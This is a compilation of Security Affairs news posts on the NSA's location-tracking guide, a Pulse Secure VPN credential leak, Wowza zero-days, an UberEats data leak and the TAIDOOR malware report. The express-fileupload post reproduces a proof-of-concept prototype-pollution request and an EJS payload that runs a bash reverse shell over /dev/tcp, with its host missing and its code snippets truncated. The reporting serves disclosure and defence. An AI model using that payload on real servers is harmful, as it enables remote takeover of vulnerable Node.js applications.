“Mobile devices store and share device geolocation data by design. This data is essential to device communications and provides features—such as mapping applications—that users consider indispensable. Mobile devices determine location through any combination of Global Positioning System (GPS) and wireless signals (e.g., cellular, wireless (Wi-Fi®1 ), or Bluetooth®2 (BT)).” reads the NSA’s guide. “Location data can be extremely valuable and must be protected. It can reveal details about the number of users in a location, user and supply movements, daily routines (user and organizational), and can expose otherwise unknown associations between users and locations.”

The agency reminds its staff that location data are extremely valuable information that must be properly protected. It can reveal the position of the individuals, user and supply movements, and daily routines, among others. The exposure of such data is especially critical for personnel of intelligence agencies and defense.

The guide pointed that such location devices may have been designed to store or transmit location data even when location settings or all wireless capabilities have been disabled.

The guide also highlights that location data from a mobile device can be obtained even without provider cooperation. An attacker could use commercially available rogue base stations to easily obtain real-time location data and track targets.

“This equipment is difficult to distinguish from legitimate equipment, and devices will automatically try to connect to it, if it is the strongest signal present.” continues the guide.

Mitigations could help to reduce, but do not eliminate, location tracking risks in mobile devices. In many cases, users rely on features disabled by such mitigations, making such safeguards impractical.

The guide includes multiple mitigations, including turning off radios when not in use, disabling features like “Find my Phone,” and using a VPN,

The experts also recommend disabling advertising permissions to the greatest extent possible by limiting ad tracking and resetting the advertising ID for the device on a regular basis (at least on a weekly basis).

“While it may not always be possible to completely prevent the exposure of location information, it is possible—through careful configuration and use—to reduce the amount of location data shared,” the guide concludes. “Awareness of the ways in which such information is available is the first step.”

Pierluigi Paganini

(SecurityAffairs – NSA, location services)

The post NSA releases a guide to reduce location tracking risks appeared first on Security Affairs.

Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers

ZDNet reported in exclusive that a list of passwords for 900+ enterprise VPN servers has been shared on a Russian-speaking hacker forum.

ZDNet has reported in exclusive that a list of plaintext usernames and passwords for 900 Pulse Secure VPN enterprise servers, along with IP addresses, has been shared on a Russian-speaking hacker forum.

ZDNet has obtained a copy of the list with the help of threat intelligence firm KELA and verified confirmed the authenticity of the data.

The list includes:

  • IP addresses of Pulse Secure VPN servers
  • Pulse Secure VPN server firmware version
  • SSH keys for each server
  • A list of all local users and their password hashes
  • Admin account details
  • Last VPN logins (including usernames and cleartext passwords)
  • VPN session cookies

According to Bank Security, all the Pulse Secure VPN servers included in the list were vulnerable to the CVE-2019-11510 flaw.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerability could be easily exploitable by using publicly available proof-of-concept code.

In august 2019, researchers from BadPackets analyzed the number of Pulse Secure VPN endpoints vulnerable to the CVE-2019-11510. Using the online scanning service BinaryEdge the researchers found 41,850 Pulse Secure VPN endpoints exposed online, 14,528 of them vulnerable to CVE-2019-11510.

Most of the vulnerable hosts were in the U.S. (5,010), followed by Japan (1,511), the U.K. (830) and Germany (789).


The researchers also analyzed the distribution of the vulnerable hosts by industry and discovered that the flaw affects hosts in:

According to BadPacket, 677 out of the 913 unique IP addresses found in the list were detected by Bad Packets CTI scans to be vulnerable to CVE-2019-11510 immediately after the exploit was made public in 2019.

  • U.S. military, federal, state, and local government agencies
  • Public universities and schools
  • Hospitals and health care providers
  • Electric utilities
  • Major financial institutions
  • Numerous Fortune 500 companies

Likely the threat actors who compiled this list scanned the internet for Pulse Secure VPN servers between June 24 and July 8, 2020, and exploited the CVE-2019-11510 vulnerability to gather server details.

Companies on the list have to update their Pulse Secure servers and of course, change their passwords.

ZDNet researchers pointed out that ransomware operators could use the leaked credentials to target large enterprise.

“Making matters worse, the list has been shared on a hacker forum that is frequented by multiple ransomware gangs. For example, the REvil (Sodinokibi), NetWalker, Lockbit, Avaddon, Makop, and Exorcist ransomware gangs have threads on the same forum, and use it to recruit members (developers) and affiliates (customers).” reported ZDNet.

Pierluigi Paganini

(SecurityAffairs – hacking, Pulse VPN)

The post Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers appeared first on Security Affairs.

Exclusive: TIM’s Red Team Research finds 4 zero-days in WOWZA Streaming Engine product

Researchers from TIM’s Red Team Research (RTR) have discovered another 4 new zero-day vulnerabilities in the WOWZA Streaming Engine product.

Last month, the TIM’s Red Team Research (RTR) disclosed 2 new vulnerabilities affecting the Oracle Business Intelligence product with High severity. Today, the TIM’s Red Team Research led by Massimiliano Brolli, discovered 4 new vulnerabilities that have been addressed by the manufacturer WOWZA Streaming Engine, between the end of 2019 and July 2020.

WOWZA Streaming Engine

Wowza Streaming Engine (known as Wowza Media Server) is a unified streaming media server software developed by Wowza Media Systems based in Colorado, in the United States of America and used by many US government entities such as NASA, US Air force, Boeing, New York Police Department and many other clients around the world.

The vulnerabilities discovered by the team, tracked as CVE-2019-19454, CVE-2019-19455, CVE-2019-19453 and CVE-2019-19456, are an “Arbitrary File Download”, “Path traversal” and 2 “Cross-site Scripting” (the first two with High Severity and the others with Medium one) respectively. The issues were discovered during laboratory tests, promptly managed in a CVD (Coordinated Vulnerability Disclosure) process with the vendor.

Some of these vulnerabilities can be chained together by a remote attacker to execute arbitrary code on the impacted system, they can also provide full access to all the data it contains, through the user interface.

The laboratory has been active for less than a year (based on the registered CVE) and unknown vulnerabilities have already been identified on various products including NOKIA, Selesta, and Oracle. The research team has identified a total of 16 new published CVEs, as reported on the NVD (National Vulnerability Database) and on TIM’s Corporate website, available at

TIM is one of the very few Italian industrial realities to conduct research of undocumented vulnerabilities, for this reason I suggest you to follow them carefully.

Pierluigi Paganini

(SecurityAffairs – hacking, WOWZA Streaming Engine)

The post Exclusive: TIM’s Red Team Research finds 4 zero-days in WOWZA Streaming Engine product appeared first on Security Affairs.

Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection

Expert found a flaw in a popular NodeJS module that can allow attackers to perform a denial-of-service (DoS) attack on a server or get arbitrary code execution.

The NodeJS module “express-fileupload,” which has more that 7.3 million times downloads from the npm repository.

The NodeJS module is affected by a ‘Prototype Pollution’ CVE-2020-7699 vulnerability that can allow attackers to perform a denial-of-service (DoS) attack on a server or inject arbitrary code.

“This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.” reads the NIST’s description.

Unfortunately, the actual number of installs could be greater because developers could download the module from alternative repositories, including GitHub and mirror websites.

Prototypes are used to define a JavaScript object’s default structure and default values, they are essential to specify an expected structure when no values are set.

An attacker that is able to modify a JavaScript object prototype can make an application crash and change behavior if it doesn’t receive the expected values.

Due to the diffusion of JavaScript, the exploitation of prototype pollution flaws could have serious consequences on web applications.

Prototyping attacks consist of injecting incompatible types of objects into existing ones to trigger errors that could lead to Denial of Service (DoS) condition or arbitrary code execution, including the establishment of a remote shell.

According to the security researcher Posix who discovered the vulnerability, the issue leverages the “parseNested” feature implemented by the express-fileupload.

The express-fileupload module implements several options for uploading and managing files in the nodejs application. One of the options is the parseNested which makes argument flatten into nested objects.

“Therefore, if we provide {"a.b.c": true} as an input,
Internally, It will used as {"a": {"b": {"c": true}}}reads the post published by Posix.

Below the code for the the ‘parseNested’ option:

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
res.end('express-fileupload poc');


Upon providing a payload in the “Content-Disposition” HTTP header, an attacker can provide a “__proto__.toString” value to trigger the attack.

“Therefore, configure and run the express server using express-fileupload in the above form.” continues the post.

Content-Type: multipart/form-data; boundary=——–1566035451
Content-Length: 123

Content-Disposition: form-data; name=”name”; filename=”filename”


The “__proto__” mutator can be used to modify JavaScript’s “Prototype” property as inherited by all JS objects and structures.

This means that the above HTTP request will override and corrupt the build-in “toString” method of every object present in users’ code.

“If Object.prototype.toString can be polluted, this will cause an error, and for every request, express [sic] always returns 500 error,” continues the researcher.

The researcher also explained that an attacker could exploit the same flaw to get a shell on the vulnerable system. For this variant of the attack, it is necessary that the vulnerable “express-fileupload” version used by the application was also using the templating engine EJS (Embedded JavaScript templates).

“The simplest way to obtain shell through prototype solution in the express application is by using the ejs. Yes, There is a limitation to whether the application should be using the ejs template engine” continues the expert.

An attacker can trigger the issue by sending an HTTP request that overwrites the “outputFunctionName” option of EJS.

The payload below exploits prototype pollution within express-fileupload, and instructs EJS (should it be in use) to execute a NodeJS “child_process.” This process can be used to get a reverse shell to the attacker’s computer.

Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 221

Content-Disposition: form-data; name="__proto__.outputFunctionName";

x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/ 0>&1"');x

The good news is that immediately after receiving the researcher’s report, the “express-fileupload” fixed the vulnerability. Users are recommended to get the latest 1.1.9 version from the npm repository.

Pierluigi Paganini

(SecurityAffairs – hacking, D-Link)

The post Flaw in popular NodeJS ‘express-fileupload’ module allows DoS attacks and code injection appeared first on Security Affairs.

UberEats data leaked on the dark web

Security researchers from threat intelligence firm Cyble have discovered user records of American online food ordering and delivery platform UberEats on DarkWeb.

Another day, another data breach made the headlines, this time the alleged victim is UberEATS.

UberEats is an American online food ordering and delivery platform launched by Uber in 2014.

During the process of darkweb and deep web monitoring, the Cyble Research Team came across a threat actor who leaked user records of UberEATS. 

The researchers were able to analyze some files leaked by the threat actors containing UberEATS delivery drivers, delivery partners, and customers.

“During our research process, the Cyble Research Team got hold of some informative details related to this leak.” reads the post published by Cyble.

The experts analyzed 9 TXT files leaked by the threat actor which contained details of UberEATS delivery drivers, delivery partners, and customers. The leaked files also include login credentials of 579 UberEATS customers and details of 100 delivery drivers.

Exposed records include information such as login credentials, full name, contact number, trip details, bank card details, account creation date.


Cyble researchers provided the following recommendations:

  • Never share personal information, including financial information over the phone, email or SMSs
  • Use strong passwords and enforce multi-factor authentication where possible
  • Regularly monitor your financial transaction, if you notice any suspicious transaction, contact your bank immediately.
  • Turn-on automatic software update feature on your computer, mobile and other connected devices where possible and pragmatic
  • Use a reputed anti-virus and internet security software package on your connected devices including PC, Laptop, Mobile
  • People who are concerned about their exposure in darkweb can register at to ascertain their exposure.

Pierluigi Paganini

(SecurityAffairs – hacking, UberEats)

The post UberEats data leaked on the dark web appeared first on Security Affairs.

US govt agencies share details of the China-linked espionage malware Taidoor

China-linked hackers carried out cyber espionage campaigns targeting governments, corporations, and think tanks with TAIDOOR malware

The FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense (DoD) released information on a RAT variant, dubbed TAIDOOR, used by China-linked hackers in cyber espionage campaigns targeting governments, corporations, and think tanks.

“The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD) have identified a malware variant—referred as TAIDOOR—used by the Chinese government.” reads the US CISA alert.

“CISA encourages users and administrators to review Malware Analysis Report MAR-10292089-1.v1, U.S. Cyber Command’s VirusTotal page, and CISA’s Chinese Malicious Cyber Activity page for more information.”

The U.S. Cyber Command has also uploaded four TAIDOOR samples to the repository VirusTotal.

US government agencies published the Malware Analysis Report MAR-10292089-1.v1 (AR20-216A) that includes technical details of the malicious code, such as indicators of compromise (IOCs) and YARA rules for each of sample analyzed by the experts.

“FBI has high confidence that Chinese government actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. CISA, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to Chinese government malicious cyber activity.” reads Malware Analysis Report MAR-10292089-1.v1.

“This MAR includes suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.”

In July, US Justice Department accused two Chinese hackers of stealing trade secrets from companies worldwide and targeting firms developing a COVID-19 vaccine. In May, the FBI and CISA also warned cyber attacks coordinated by Beijing and attempting to steal COVID-19 information from US health care, pharmaceutical, and research industry sectors.

The CISA agency provides recommendations for system administrators and owners to enhance the level of security of their organizations:

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Pierluigi Paganini

(SecurityAffairs – hacking, Taidoor)

The post US govt agencies share details of the China-linked espionage malware Taidoor appeared first on Security Affairs.